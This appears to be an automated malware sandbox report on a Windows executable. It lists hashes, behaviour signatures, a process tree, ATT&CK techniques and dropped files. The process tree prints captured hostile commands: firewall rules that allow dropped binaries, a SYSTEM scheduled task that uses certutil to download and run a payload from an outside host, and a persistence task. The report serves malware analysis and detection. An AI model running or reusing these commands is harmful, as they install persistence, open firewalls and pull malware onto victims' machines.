d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90

General

Target

d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
Size

3.9MB
MD5

de7029a8adb05fd10cafd0ef1df1fb90
SHA1

32d1100326f06828b50b9f58b42a3dbc5adad91b
SHA256

d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90
SHA512

5866ab74a59c60495d9b72ac9e121a7353729f7ed86842c741b457fe8a86280f05a174e32a12999da823a1535a2101a537aec96bf64bfbba078d407a8e1d8ce7

Score

10^/10

evasion

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 4664 created 2392 4664 svchost.exe d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

1644 bcdedit.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4220 5000 WerFault.exe d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2368 schtasks.exe
2512 schtasks.exe

description	pid	process	target process
PID 4664 created 2392	4664	svchost.exe	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe

pid	process
1644	bcdedit.exe

pid	pid_target	process	target process
4220	5000	WerFault.exe	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe

pid	process
2368	schtasks.exe
2512	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exed062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe

pid	process
2392	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
2392	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
5000	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
5000	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2392	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
Token: SeImpersonatePrivilege	2392	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
Token: SeTcbPrivilege	4664	svchost.exe
Token: SeTcbPrivilege	4664	svchost.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

svchost.exed062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.execmd.exe

description	pid	process	target process
PID 4664 wrote to memory of 5000	4664	svchost.exe	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
PID 4664 wrote to memory of 5000	4664	svchost.exe	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
PID 4664 wrote to memory of 5000	4664	svchost.exe	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
PID 5000 wrote to memory of 428	5000	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe	cmd.exe
PID 5000 wrote to memory of 428	5000	d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe	cmd.exe
PID 428 wrote to memory of 3928	428	cmd.exe	netsh.exe
PID 428 wrote to memory of 3928	428	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
"C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
"C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5000

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:428

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
PID:3928

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
3⤵
PID:320

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
4⤵
PID:2520

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:3952

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotbooks.tech/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:2368

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:2512

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:1644

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:2908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 852
3⤵
- Program crash
PID:4220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5000 -ip 5000
1⤵
PID:3176

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
923KB

MD5
f7026d342ec3138975baae46055dd2ee

SHA1
56d955b60a69cb44a35f28507211dc01777e2f7a

SHA256
185dd733af2e462e2b735eb0ee8111138674f663c752e6fc3a42a7e80008d0e8

SHA512
4bddfb0cb532cd3fb198906440d7eee8aa3a2bc1950afe83a3a5fe567595352581ae43b0245fc969da9e2e75d6e67b371c0a24ff29db24447f5426b6a4dd839f

Download Submit
C:\Windows\rss\csrss.exe
Filesize
2.0MB

MD5
2b9d10dca8a3cd7a4dcd49830aa2f0c5

SHA1
29d231058f7772f9426b9b3c5b8ede9b411fdfdd

SHA256
9c8bbbcd60897cc8fe6d1c5cd364fdadd99a546a797792e4c52d7d77f95379bb

SHA512
fcefd0ca13688e78044a3a0ff01ecb4ad388a4c21e4bbfed2cb6f22544bc8cc851bc0634105b4e8e86b9cbb47bd583835e3c7bc0ee23f69b3e740ce6c0541809

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.9MB

MD5
49f3d134111bbcfd655a0b8751bdd266

SHA1
d7b39a56602033572399a93308fbfe79273736ef

SHA256
c484d5519a94ddb9b8c8e2227e63ab96b11c681e2e74f3b093c04f945379a4ee

SHA512
b28f666d5e9481fb38dbe7331787b03d399ac1de4d25aac5067fe0b7b4839f32d25dd2653420ada082caf8af6b87cac749012442e6e48d480704521d52bf8a71

Download Submit
memory/320-139-0x0000000000000000-mapping.dmp

Download
memory/428-134-0x0000000000000000-mapping.dmp

Download
memory/1644-150-0x0000000000000000-mapping.dmp

Download
memory/2368-147-0x0000000000000000-mapping.dmp

Download
memory/2392-130-0x0000000004F93000-0x000000000533A000-memory.dmp

Filesize
3.7MB

Download
memory/2392-132-0x0000000000400000-0x0000000002FC6000-memory.dmp

Filesize
43.8MB

Download
memory/2392-131-0x0000000005340000-0x0000000005A36000-memory.dmp

Filesize
7.0MB

Download
memory/2512-146-0x0000000000000000-mapping.dmp

Download
memory/2520-140-0x0000000000000000-mapping.dmp

Download
memory/2908-148-0x0000000000000000-mapping.dmp

Download
memory/3928-135-0x0000000000000000-mapping.dmp

Download
memory/3952-145-0x0000000000400000-0x0000000002FC6000-memory.dmp

Filesize
43.8MB

Download
memory/3952-144-0x0000000005100000-0x00000000054A7000-memory.dmp

Filesize
3.7MB

Download
memory/3952-141-0x0000000000000000-mapping.dmp

Download
memory/5000-138-0x0000000000400000-0x0000000002FC6000-memory.dmp

Filesize
43.8MB

Download
memory/5000-137-0x0000000005070000-0x0000000005766000-memory.dmp

Filesize
7.0MB

Download
memory/5000-136-0x0000000004CC0000-0x0000000005067000-memory.dmp

Filesize
3.7MB

Download
memory/5000-133-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads